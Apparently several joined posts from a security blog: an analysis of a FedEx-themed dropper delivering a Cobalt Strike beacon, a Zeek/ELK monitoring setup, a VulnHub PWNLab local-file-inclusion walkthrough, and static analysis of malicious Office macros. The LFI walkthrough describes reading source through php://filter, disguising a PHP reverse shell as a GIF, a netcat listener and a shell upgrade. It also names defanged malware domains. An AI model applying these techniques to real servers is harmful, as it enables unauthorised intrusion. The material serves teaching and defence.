They are generally quite simple and are not difficult to analyse. You can easily view the content of a JNLP file by changing the extension to XML and loading the file in a text editor like notepad++. As shown in the XML code below, we can see that this JNLP file will be used to load and execute the JAR file FedEx_Delivery_invoice.jar from the domain hxxp://fedex-tracking.fun
As we know the name and location of the 2nd stage payload, we can try and download it. The domain hxxp://fedex-tracking.fun is still up, so we can download the FedEx_Delivery_invoice.jar file from here. Once we have the file, we will analyse it with JD-GUI. JD-GUI is a simple tool that allows you to decompile and view the code of JAR files. (I copied the code into Atom after opening with JD-GUI as I like the syntax highlighting there.)
As the code snippet above shows, the FedEx_Delivery_invoice.jarfile is going to attempt to download the file fedex912.exe from the domainhxxp://fedex-tracking[.]press. The executable will be placed into the Windows temp directory, where it will then be executed. The JAR file will also load the legitimate FedEx tracking website which is most likely to try and reassure the user that the file they have downloaded is a legitimate one.
Executable Analysis: Stage 2
Unfortunately, at the time of writing, the domain hosting the fedex912.exe is no longer active meaning we cannot download the file from here. However, there is a sample on Virus Total that we can download. I ran the executable in my analysis environment with process monitor and regshot and there were a few things of note. Firstly, the file fedex912.exe drops a new file called gennt.exe, which is basically just a copy of itself, into the directory C:\ProgramData\9ea94915b24a4616f72c\. The reason for placing the file here is that it is a hidden directory and not normally visible to the user. It then deletes the fedex912.exe file from the filesystem.
I used RegShot to take a before and after snapshot of the registry to compare the two after running the executable. The entry below shows the malware’s persistence mechanism. Adding the gennt.exe executable to the registry key here ensures that the malware is started every time Windows is restarted.
After doing some additional research on the executable, I found that it is supposed to launch cmd which then launches PowerShell. However, that did not occur on my test machine when running the executable. There could be a few reasons for this, one could be that the malware has anti-analysis capabilities and knows when it is being run in a standard VM. As my lab is not currently set up to counter VM aware malware, we are going to cheat slightly and use data from a sample that was run on AnyRun.
On the AnyRun analysis, we can see that cmd did launch "C:\Windows\System32\cmd.exe" /c powershell -nop -w hidden -encodedcommand” where a Base64 command was parsed to PowerShell. AnyRun records the command line, so let’s have a look into this. You can see the AnyRun anlysis here.
PowerShell Analysis: Stage 3
As is usually the case, the command line was encoded with Base64 so I used CyberChef to decode the text. Often when you decode Base64 text there will be a “.” between every single character. This is annoying but can easily be fixed by also adding a decode text operator to the recipe and setting the value to UTF-16LE(1200).
We can see that the command is further encoded with Base64, and if we scroll further down to the bottom, we can also see that it has been compressed with GunZip.
I used CyberChef to once again decode the Base64 and to decompress the GunZip Compression.
After running the above CyberChef recipe there was finally some human-readable text. There’s a lot of interesting stuff happening here. So we essentially have three parts to the PowerShell script, there’s the first chunk with a couple of functions. The middle section with a Base64 Encoded block and a “for” statement. And then there’s the final section with some defined variables and an “if” statement. We’ll tackle the Base64 Encoded block first and look at the rest of the PowerShell script a little later.
NOTE: I had to split the code screenshots into two, as there is too much code to fit into one image. I’d much rather just post the raw code, rather than screenshots, but that would result in my site being flagged for hosting malware 😂. You can download the code samples at the bottom of this post.
One thing that immediately stands out is a “for” statement underneath the Base64 encoded text in the “Powershell Script part 2” image.
The “for” statement suggests that the Base64 block is encrypted with xor with a key of 35. We can also use CyberChef to decrypt this.
As shown in the above output, a lot of it is not human-readable but we can see what looks like an IP address and information about a User-Agent. The rest of the code that we cannot understand looks to be shellcode. Let us try and do some basic shellcode analysis to see what is going on here.
I used CyberChef to convert the code above into Hex. This is straight forward to do, and only requires an additional two operators to our current CyberChef recipe. One operator converts our code into Hex, and the other is a find and replace to remove the spacing.
Once we have our Hex code, you can save the output as a .dat file. Next, I used the tool scdbg to analyse the shellcode. This tool emulates basic Windows behaviour and can intercept what Windows API calls the shellcode is requesting by emulating the Windows API environment.
After parsing the .dat file to the tool, the output below is given. The shellcode loads the wininet API library and imports two functions which are used to establish an internet connection. We can see that the connection is established to the IP address we saw earlier over port 8080.
As the shellcode does not import any other functions, it would appear that this is a simple beacon program that establishes a remote connection to the malicious IP. Additional commands are likely to be sent from the C2 server. The C2 IP address is a Ukrainian address, with ports 80, 8080 and 22 open.
Injecting into memory with PowerShell
So we’ve looked at our Base64 encoded block and determined that it’s some simple shellcode which is used to establish a connection to the C2 server. The one question we still have to answer is how is the shellcode executed? From looking at the rest of the PowerShell script, we can see that the shellcode is injected directly into memory. Below gives a basic summary of how it does this.
First the script imports two functions GetModuleHandle and GetProcAddress from system.dll, and it does this by importing them directly from memory, so it does not load the DLL from disk. These are both Windows UnsafeNativeMethods. This method of loading DLLs in this way is called Run-Time Dynamic Linking, and you can read more on it here.
These functions are then used to allocate space in memory for the function “var_va” which is the function which contains our shellcode.
Then the script decodes and decrypts the shellcode, in the same way that we did earlier with CyberChef
Next, the VirtualAlloc writes the shellcode function to space in memory for the calling process. In this case, that would be PowerShell. So, the shellcode is essentially injected into the memory space used by PowerShell.
And finally, the shellcode is then executed, where it establishes a C2 channel with the Cobalt Strike server.
What is Coablt Strike?
AnyRun attributed the PowerShell activity to Cobalt Strike and the PowerShell script and the shellcode that we analysed matches the profile and behaviour of a Cobalt Strike Beacon. Cobalt Strike is a tool used for adversary simulations and red team operations. A key feature of the tool is being able to generate malware payloads and C2 channels. The Cobalt Strike Beacon that we saw is fileless, meaning that the PowerShell script injects the Beacon straight into memory and never touches disk. Once a Cobalt Strike Beacon is present on a device, the attacker has significant capability to perform additional actions including stealing tokens and credentials for lateral movement.
Conclusion
So that brings this post to an end. I hope you found the information here useful. It’s a simple example of fileless malware and I think a good introduction for those who are maybe not very familiar with the area. It’s certainly a topic that I’m interested and something I want to research further, so expect more posts on this in the future!
This post marks the second instalment of the “Create enterprise monitoring at home” series, here is part one in case you missed it. In this post, we’ll be looking at how to send Zeek logs to ELK Stack using Filebeat. A few things to note before we get started,
I’m running ELK in its own VM, separate from my Zeek VM, but you can run it on the same VM if you want.
ELK is running on a Ubuntu 18.04 VM.
It’s pretty easy to break your ELK stack as it’s quite sensitive to even small changes, I’d recommend taking regular snapshots of your VMs as you progress along.
Installing Elastic
Installing Elastic is fairly straightforward, firstly add the PGP key used to sign the Elastic packages.
Once installed, we need to make one small change to the ElasticSearch config file, /etc/elasticsearch/elasticsearch.yml. We’re going to set the bind address as 0.0.0.0, this will allow us to connect to ElasticSearch from any host on our network. It’s worth noting, that putting the address 0.0.0.0 here isn’t best practice, and you wouldn’t do this in a production environment, but as we are just running this on our home network it’s fine.
Once that’s done, let’s start the ElasticSearch service, and check that it’s started up properly.
sudo service elasticsearch start
sudo service elasticsearch status
You should get a green light and an active running status if all has gone well. Next, we want to make sure that we can access Elastic from another host on our network. I’m going to use my other Linux host running Zeek to test this. Run the curl command below from another host, and make sure to include the IP of your Elastic host.
curl -X GET "IP OF YOUR ELASTIC HOST:9200/?pretty"
If all has gone right, you should get a reponse simialr to the one below.
Installing Kibana
Now it’s time to install and configure Kibana, the process is very similar to installing elastic search. We’ve already added the Elastic APT repository so it should just be a case of installing the Kibana package.
One it’s installed we want to make a change to the config file, similar to what we did with ElasticSearch. Change the server host to 0.0.0.0 in the /etc/kibana/kibana.yml file.
Once it’s installed, start the service and check the status to make sure everything is working properly.
sudo service kibana start
sudo service kibana status
You should get a green light and an active running status if all has gone well. Now let’s check that everything is working and we can access Kibana on our network. Browse to the IP address hosting kibana and make sure to specify port 5601, or whichever port you defined in the config file. You should see a page similar to the one below.
Configuring Zeek
Now that we’ve got ElasticSearch and Kibana set up, the next step is to get our Zeek data ingested into ElasticSearch. There are a couple of ways to do this. Kibana has a Filebeat module specifically for Zeek, so we’re going to utilise this module.
First, go to the SIEM app in Kibana, do this by clicking on the SIEM symbol on the Kibana toolbar, then click the “add data” button. As shown in the image below, the Kibana SIEM supports a range of log sources, click on the “Zeek logs” button.
You have to install Filebeats on the host where you are shipping the logs from. So in our case, we’re going to install Filebeat onto our Zeek server. Follow the instructions specified on the page to install Filebeats, once installed edit the filebeat.yml configuration file and change the appropriate fields. The username and password for Elastic should be kept as the default unless you’ve changed it. Make sure to change the Kibana output fields as well.
Once that is done, we need to configure Zeek to convert the Zeek logs into JSON format. First, stop Zeek from running.
zeekctl stop
Then edit the line @load policy/tuning/json-logs.zeek to the file /opt/zeek/share/zeek/site/local.zeek
Restart zeek
zeekctl deploy
And now check that the logs are in JSON format. Even if you are not familiar with JSON, the format of the logs should look noticeably different than before.
tail -f /opt/zeek/logs/current/dns.log
Now we need to configure the Zeek Filebeat module. First, enable the module.
sudo filebeat modules enable zeek
Then edit the config file, /etc/filebeat/modules.d/zeek.yml. We need to specify each individual log file created by Zeek, or at least the ones that we wish for Elastic to ingest. For each log file in the /opt/zeek/logs/ folder, the path of the “current” log, and any previous log have to be defined, as shown below.
If there are some default log files in the opt folder, like capture_loss.log that you do not wish to be ingested by Elastic then simply set the “enabled” field as false. It’s important to set any logs sources which do not have a log file in /opt/zeek/logs as enabled: false, otherwise, you’ll receive an error. Also be sure to be careful with spacing, as YML files are space sensitive.
Once that’s done, you should be pretty much good to go, launch Filebeat, and start the service.
sudo filebeat setup
sudo service filebeat start
If everything has gone right, you should get a successful message after checking the
If you go the network dashboard within the SIEM app you should see the different dashboards populated with data from Zeek! The dashboards here give a nice overview of some of the data collected from our network. We’ll learn how to build some more protocol-specific dashboards in the next post in this series.
Enriching with Suricata
This next step is an additional extra, it’s not required as we have Zeek up and working already. However adding an IDS like Suricata can give some additional information to network connections we see on our network, and can identify malicious activity. Some people may think adding Suricata to our SIEM is a little redundant as we already have an IDS in place with Zeek, but this isn’t really true. While Zeek is often described as an IDS, it’s not really in the traditional sense. Zeek collects metadata for connections we see on our network, while there are scripts and additional packages that can be used with Zeek to detect malicious activity, it does not necessarily do this on its own. Suricata is more of a traditional IDS and relies on signatures to detect malicious activity. Now I often question the reliability of signature-based detections, as they are often very false positive heavy, but they can still add some value, particularly if well-tuned.
Installing Suricata
I’m not going to detail every step of installing and configuring Suricata, as there are already many guides online which you can use. I used this guide as it shows you how to get Suricata set up quickly. I’m going to install Suricata on the same host that is running Zeek, but you can set up and new dedicated VM for Suricata if you wish. Just make sure you assign your mirrored network interface to the VM, as this is the interface in which Suricata will run against.
Once you have Suricata set up its time configure Filebeat to send logs into ElasticSearch, this is pretty simple to do. Navigate to the SIEM app in Kibana, click on the “add data” button, and select Suricata Logs
Follow the instructions, they’re all fairly straightforward and similar to when we imported the Zeek logs earlier. Step 3 is the only step that’s not entirely clear, for this step, edit the /etc/filebeat/modules.d/suricata.yml by specifying the path of your suricata.json file.
var.paths: ["/my/path/suricata.json"]
Once that’s done, complete the setup with the following commands.
./filebeat setup
./filebeat -e
If all has gone right, you should recieve a success message when checking if data has been ingested.
We can also confirm this by checking the networks dashboard in the SIEM app, here we can see a break down of events from Filebeat.
Conclusion
And that brings this post to an end! It’s fairly simple to add other log source to Kibana via the SIEM app now that you know how. I’d recommend adding some endpoint focused logs, Winlogbeat is a good choice.
I’d say the most difficult part of this post was working out how to get the Zeek logs into ElasticSearch in the correct format with Filebeat. It’s not very well documented. In the next post in this series, we’ll look at how to create some Kibana dashboards with the data we’ve ingested.
In this series, I’m going to show you how you can utilise open source technology to build your own network monitoring solution good enough to be deployed in any enterprise environment! The two core technologies that we’re going to use are Zeek (formerly Bro) and ELK.
For those unaware, Zeek is an open-source network monitoring framework which creates alerts and events based from data collected by a network tap. One way in which I used to describe Zeek to people is that it’s essentially an IDS but on steroids. It’s used throughout the industry, especially in the network anomaly space, in fact, the UK cybersecurity company Darktrace uses Zeek as a key component of their product.
The plan for this solution is to tap our home network with Zeek and feed the logs into Elk, with Elk we can run queries across our data, build out some beautiful dashboards with Kibana, and even create some analytics to automate some detections. We will also look into deploying an endpoint agent on some devices to and feed those logs into ELK too.
Prerequisites
In order to follow along, you’ll need
A server/old PC capable of running Zeek and ELK
In my case, I have an HP Proliant ML350e running ESXI
The server needs to have a minimum of 2 free network ports
And for it to run smoothly at least 8GB memory and a decent processor.
A managed network switch which is capable of port mirroring.
Network Architecture
The diagram below shows a rough guide to my home network. The key points to take from this diagram are the mirror tap on the network and the mirror connection. To get the most out of Zeek, you need to tap the connection on your switch that goes to your router, essentially the connection from your LAN to the internet. By doing this we will capture all traffic from our home networking going out to the internet, from devices like iPhones connected to the Wi-Fi and the PiHole acting as our DNS server.
VMware Setup
You should first check that your physical NICs on your server are visible in ESXI. Go to networking>Physical NICs in ESXi and you should see them there.
Both of these physical connections should connect into your switch, with one going into your mirror port, and the other a regular switch port. You can set your mirror port in your switch config. I have a Netgear GS110TP where port 2 is the one that goes into my router, and I have port 6 free, so that is the one I’ll configure to be the mirror port.
You’ll need to know which ports on your server correspond to which ESXi physical ports. For example, port 6 on my switch plugs into Eth1 on my server, and Eth1 is called vmnic1 in ESXi. So vmnic1 will be the mirror NIC.
Next, we need to create a virtual switch will be used for the mirror data. Go to Networking > Virtual Switches > Add Standard Virtual Switch, and enter the details shown below, selecting your mirror NIC as “Uplink 1”. Make sure that you set promiscuous mode as “accept”.
Now add a port group by going to Networking> Port Groups > Add port group, and assign the virual switch you just created to it. Again make sure Promiscuous mode is enabled.
Now you’re ready to create your virtual machine, I’m using Ubuntu Server 18.04 for mine. When creating you VM, make sure you add both network adapters, including the one you’re using for the Mirrored traffic.
Preparing for Zeek
Once you’ve got Ubuntu installed, do the usual updates.
sudo apt-get update
sudo apt-get upgrade
Now check that both of your network interfaces are detected by Ubuntu. It is highly likely that your Mirror port will be down. As you can see from the image below, both of my interfaces are detected but only the management interface (ens160) is up with an IP address assigned.
To fix this, let’s first put the interface into promiscuous mode, and then bring it “up”.
ip link set "your mirror int" promisc on
ip link set "your mirror int" up
Lets now check that we’re receiving traffic on the mirror port by running tcpdump.
tcpdump -i "your mirror int"
If everything has worked, you should see the mirrored traffic flowing through the interface similar to the image below.
Installing Zeek
We’re now ready to crack on and install Zeek. To start, we need to install all the perquisites. Do so by running the command below.
Unpack the compressed files, and enter the Zeek download directory. Then set the /opt/Zeek directory we created earlier as the install directory.
cd /home/paul/zeek
./configure --prefix=/opt/zeek
Now we’re ready to install Zeek, run the following make commands, and leave it to install (this can take some time)
make
make install
Next we need to add the PATH environment variable
export PATH=/usr/local/zeek/bin:$PATH
And now we need to do add some basic config to the node.cfg file which is located in the /opt/etc/ directory. Uncomment the manager, proxy and worker-1 settings, and define your mirror interface in the worker-1 settings.
Now we’re ready to deploy Zeek by running the command below
zeekctl deploy
If all goes well we should not get any errors, and we can check to make sure everything started up properly by checking the status of zeek.
zeekctl status
Everything looks good! So now let’s go and check our logs where our captured data is being written to. Logs are located in directory /opt/zeek/logs/ The directory “current” holds the logs for the current day, while logs from previous days are archived off into their own directories. There’s also a different log file for different data types, like DNS connections, HTTP connections, etc…
Lets check the DNS logs
tail -f dns.log
Awesome! So everything is working correctly!
That concludes this post, keep an eye out for part 2 of this series, we’re going to deploy ELK and feed our logs into Elastic Search where we can build some beautiful dashboards to display our captured data.
This post is going to look at a Local File Inclusion vulnerability and how it can be exploited to gain a shell on a web server. To demonstrate this I’m going to be using the PWNLab exercise from VulnHub as it uses a nice example of LFI and also requires some other basic pentest steps which I think are useful to know as well. I’ll be using ParrotOS as my “attacker” virtual machine.
What is LFI?
Local File Inclusion is a vulnerability which predominantly affects web applications that allows an attacker to read and execute files. There are many different types of LFI, in this example, we’ll be looking at a couple of examples which exploits LFI in PHP scripts. In most cases, LFI is caused by poor coding practice where variables are not properly defined or where sanitization is not used correctly, this can allow an attacker to upload or replace a file with their own malicious one, which is exactly what we’re going to do in this case.
Exploiting LFI
For those that wish to follow along, you can download the PWNLab VM image here.
To start we need to find out the IP address of our vulnerable device, we start by running a simple NMAP scan across the 192.168.1.0/24 range. We can see the IP address of our vulnerable device, and we can see from the NMAP scan that it’s running a web server, so let’s navigate to the IP in a web browser. We are greeted by a webpage with three buttons, the login and upload ones being of most interest. If we try to upload a file, we are told that we must log in first.
As always we’re going to need to perform some reconnaissance and scanning against this IP, as we know this is a web server, so our tool of choice in this instance is Nikto. For those who are unaware, Nikto is a vulnerability scanner which comes bundled in Kali, it focuses on vulnerabilities in web applications and is a really great tool. We run a Nikto scan on our target IP.
Straight away the first thing that jumps out at is the line
/config.php: PHP Config file may contain database IDs and passwords.
If we try to navigate to the page we’re greeted by a blank page. We can, however, try to read the contents of the PHP file. The command below uses a PHP-filter to bypass PHP execution by encoding the PHP code before it has a chance to execute and instead converts the output into base64.
We can then simply decode the output, where we are presented with the raw PHP code for the config file, which contains the login details to a database.
It’s worth at this point to get the source code for the other pages on the webserver, we do this by running the same php://filter/convert command that we ran previously, but changing the resource to the other pages.
Firstly the Index page. Straight away we can see that it contains an “include” vulnerability where it’s reference a cookie called lang. We’ll make a note of that, and come back to it later.
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
if (isset($_GET['page']))
{
include($_GET['page'].".php");
}
else
{
echo "Use this server to upload and share image files inside the intranet";
}
?>
</center>
</body>
</html>
Next, we have the upload page, the main thing that sticks out here is that there is a whitelist on the type of file that can be uploaded to the webserver. It’s restricted to jpg, jpeg, gif, and png files, looking further down the code block we can see that it is not just the extension of the file that is whitelisted, but also the MIME type. If we want to upload a file onto the server, we’re going to have to bypass these whitelists.
The final page, “login”, did not contain anything of interest so I’ve not included the decoded base64 code block.
Moving on, we know the index page has an include vulnerability on it, and we know that if we are logged into the site, we can upload an image onto the webserver. Our end goal is to get a shell to the web server, so our plan is to bypass the file filtering on the upload page and upload a shell script, where we will then exploit the include vulnerability on the index page to get it to execute our shell script. First, we need to login to the site.
So we’re going to try to connect to the database via MySQL with the credentials we’ve stolen from the config file, if we run a command to connect the MySQL database running on the webserver with the username ‘root’ and enter the decoded password, it works!
We can select to “use” the “Users” table and select all (*) entries. Three users are returned, with their passwords, which look to be encoded in base64.
TIP: When pen testing it’s always a good idea to note down any usernames or passwords you encounter in a notepad file, this makes them easily accessible and will save you having to keep decoding/decrypting them.
After decoding the passwords, we can try to login with one of the users’ credentials, and bingo, we’re in! And now we have access to upload a file. As mentioned before, I’m using ParrotOS, which comes bundled with some premade web shell scripts, we’re going to be using the php-reverse-shell.php script that’s located in the directory /usr/share/webshells/php/ If you’re not using ParrotOS you can find the Shell here on GitHub
If you remember from before there are restrictions on the type of files we can upload, so we need to make some changes to the file to bypass the whitelisting. We can bypass the MIME type filtering by placing ‘GIF89;‘ at the top of our shell script. We will also need to ensure the script uses the extension ‘.gif‘ as well. Finally, we need to change the IP address and port in the shell script, the IP address will be the IP address that we want the shell to connect to (so the IP address of your host machine) and the port can be anything that isn’t currently being used.
Once that’s done, we save the file and upload it onto the webserver. The small changes worked and were able to bypass the file filtering. We can confirm that the file was successfully uploaded by navigating to the “upload directory” on the webserver (which in this case is located at http://192.168.1.72/upload). Here we can see the fake GIF file we uploaded, where the hash value of the file has been used to rename the file. We need to make a note of the new file name, as we’re going to need it in the next step.
For the next step, we’re going to be using Burp Suite. Firstly we need to intercept a page using the “Proxy” module in Burp, you’ll need to configure your browser to use Burp as a proxy, you can find a guide on how to do so here. Once that’s done, make sure you have “intercept” turned on within the proxy module in Burp, and navigate to any page on the Pwnlab web server. You should intercept something which looks similar to the image below.
The thing we are interested in here is the Cookie value, if you remember back to earlier the Cookie Lang contained an inclusion vulnerability. We’re going to point the Cookie Lang to our PHP shell script which we uploaded onto the server. To do this, right-click anywhere in the whitespace in the output of the page you intercepted in Burp intercept and select “send to repeater”. Now navigate to the repeater module in Burp and replace the cookie called lang with the path of the script we uploaded earlier which we noted down earlier.
Before forwarding this modified request on to the webserver, we need to set up a Netcat session to listen to the port we defined in the PHP script earlier, in this case it’s 1234. (Some readers may have noticed I’ve moved over to a Windows box, this is because I broke my ParrotOS VM, not for the first time!…)
We set up a session by using the command
-l -p 1234
Then we can “send” our modified HTTP GET request to the webserver from Burp, and boom, we should receive a shell in Netcat as shown below.
We then can upgrade our shell by running the below command.
python -c 'import pty;pty.spawn("bin/bash")'
And now we’re free to roam around on the web server and attempt to escalate our privileges.
Conclusion
That concludes this short post on LFI with a few other pen testing tricks thrown in. Although LFI is not a new topic, due to poor practice it’s still prevalent, and I thought that this lab exercise showed a good example of how it can be exploited and the damage that can be done.
Static analysis is the process of analysing malicious code, whether it be a script or a program, to determine what action the code is trying to execute. Unlike dynamic analysis, static analysis does not involve executing or running the code.
There are loads of open source tools out there which can be used to perform static analysis, today we are going to be looking OLE Tools, and CyberChef.
OLE Tools is a Python package used to analyse Microsoft Office documents. Malicious VBA scripts within Macros embedded in Office documents is a common malware distribution technique, so OLE Tools is a very useful tool to have in your toolkit.
CyberChef is a web application created by GCHQ, it is often referred to as the swiss army knife tool of cyber, and can be used for encryption, encoding, compression and data analysis, it’s a must-have tool in any toolkit.
NOTE: It’s worth noting that this guide is meant to demonstrate the steps to reverse common obfuscation techniques. You may encounter different obfuscation techniques depending on the document sample you have, however, the same logic can still be applied.
Getting Setup
If you haven’t already, install pip.
sudo apt install python3-pip
Then install oletools.
sudo -H pip install -U oletools
Find a malicious office document, there are a number of sources where you can download these files, see the resources section at the bottom of this page for a list of sample websites.
I would suggest cape sandbox as it does not require any signup and allows you to get your hands on a sample quickly, make sure you select a sample with the file type “doc”.
Using oletools
Once you’ve got everything prepared, navigate to the directory where your downloaded file lives. Run the first command to obtain meta data around the file. (Replace the text “filename” with the name of the malicious file that you downloaded.)
olemeta "filename"
Running this command is going to return some useful meta data around the document.
Output from running “olemeta” on our malicious document
It is macros embeded in the document that we are interested in, so next lets see if the file contains any macros. Run the oleid command.
oleid "filename"
By running this command we can see that the document does contain a VBA Macro. This is what we’re interested in.
Output from running “oleid” on our malicious document
Lets try to extract those macros out of the document, run the olevba command.
olevba "filename"
The table shown in the image below will be displayed at the bottom of your terminal session, it contains an overview of what was found in the macro. The information we are interested in the most is the Base64 encoded strings. Encoding with Base64 is a common technique used by malware authors to try and obfuscate their code and make it more difficult for anti-virus to detect.
Output from running “olevba” command on our malicious document
If you scroll up the page you will see all of the data pulled from the macro, we want to find the Base64 encoded text. You should be able to easily recongise Base64 encoding, in this case it’s the big block of text.
Visual basic code from document macro encoded in Base64
The first thing to do is to take the base64 encoded text and decode it, we do this by dragging the “from Base64” operator into the recipe column. Paste the encoded text block into the input box.
Code decoded using from Base64 operator
Tip: If you’re ever unsure on the format of a piece of text or what it has been encoded with, you can use the magic operator to find out!
You should immediately be able to see that the output is now more understandable, however, the author has taken a number of steps to further obfuscate the code and make it more difficult for us to analyse. Adding punctuation between characters is a common obfuscation technique used by malware authors, as displayed in our code block below.
We’re going to take our decoded code block, and use other features in CyberChef to reverse the obfuscation and make the code more understandable. Firstly we’re going to remove the full stops between each character. Keep the “from base64” operator in your recipe, drag the Regular expression operator in as well, keep the settings at their defaults, this should remove the false stops.
Output of code with from base64 and Regular expression operators
That already looks a lot better, you should be able to see some useful information like URLs in the output, there is still some obfuscation via punctuation in the code though, so let’s remove them.
We’re going to start a new CyberChef recipe now because sometimes using lots of operators together can cause CyberChef to freak out a little. So copy the output to your clipboard, and start a new recipe.
In your new recipe paste the copied code into the input, and add the following operators.
To Lower Case
Find and Replace, x4 with the following settings.
All variables set to “simple string”
With the values
`
–
+
‘
The “replace” value should be blank for each. This replaces the punctuation with nothing, effectively removing it from the code.
Generic Code Beautify (to tidy the code up a little).
Code output after full reciepe is applied.
Hopefully after all of that you should end up with something a lot more readable. We are not done there however, we’re going to take the output and perfrom some manual editing to get a better idea of what the code is doing.
Editing with Atom
Atom is a text/source code editor, it’s my go-to choice for working with any code within Linux, see the resources section for a guide on how to install atom.
First things first, we need to install a Visual Basic package in Atom to highlight syntax for us. Do this by going to the top toolbar in Atom, click on Packages > Settings View > Install Packages. In the search bar search for VBA, and install one of the syntax highlighting packages for Visual Basic. Copy the most recent output of CyberChef, and paste it into Atom, make sure to save the file with the extension .vba so Atom can perform syntax highlighting.
VBA script with syntax highlighting in Atom.
There is still a fair amount of junk incorporated into this visual basic code. The author has defined a lot of the important components as variables, with names that give us no indication as to what they do. He has also included some junk variables as well to bulk to the code, let’s remove those first.
Defined variables which only appear once in the code, and appear to have no meaningful value are junk variables, those are the ones we want to remove. Below shows some of the junk variables from the code, note how they all fit a similar pattern. Removing these is not overall necessary, but it does help us tidy up the code a little.
The next thing we want to do is give the important variables a meaningful name. We do this by copying the name of a variable, let’s take $v83846 as an example, if we do a find and replace (control f) we can see this variable is called twice. Focus on the image below, this shows the two occurrences of the variable.
Firstly when the variable $v83846 is first defined we see a bunch of URLs bundled together separated by the “@” symbol, and at the end of the statement, there is a split on the “@” symbol. The author has bundled the URLs together and used the split function so the compiler knows to treat each URL as an individual. We can safely assume that the variable $v83846 is a list of websites, so we can rename the variable to something more useful like “sitelist“.
Highlighted variable renamed to sitelist.
We then see a foreach statement, which again refers to our previously defined variable, followed by a try statement, where it appears it is trying to download a file. It is clear the code is trying to download a file, and it has a number of sites which it is going to try and download these files from.
If we rename all of the useful variables, we should end up with something as shown below. This gives us a much better picture of what’s going on.
Code after useful variables renamed and tidying.
The script is attempting to download a file called 656 from one of the five different domains stored in the site list, it’s going to download the file into the users home directory (as defined by “userprofile“) and if the file is of a certain size (around 30MB) it’s going to attempt to invoke/execute. The reason for checking the file size is to see if the file downloaded successfully or was stopped by antivirus.
This kind of VBA script is what is known as a dropper, it’s sole purpose is to download addtional malware onto the users device. Using malcious macros embeded in Word document sent via emails is a technique used heavily by Emotet, a previliant malware campagin which in recent months has become a common way of spreading other malware.
Conclusion
That brings us to the end of this post. Hopefully, now you’ll have a better idea of how you can use open-source tools to analyse malicious office documents. Malicious documents attached in emails is still an effective and heavily used technique to spread malware.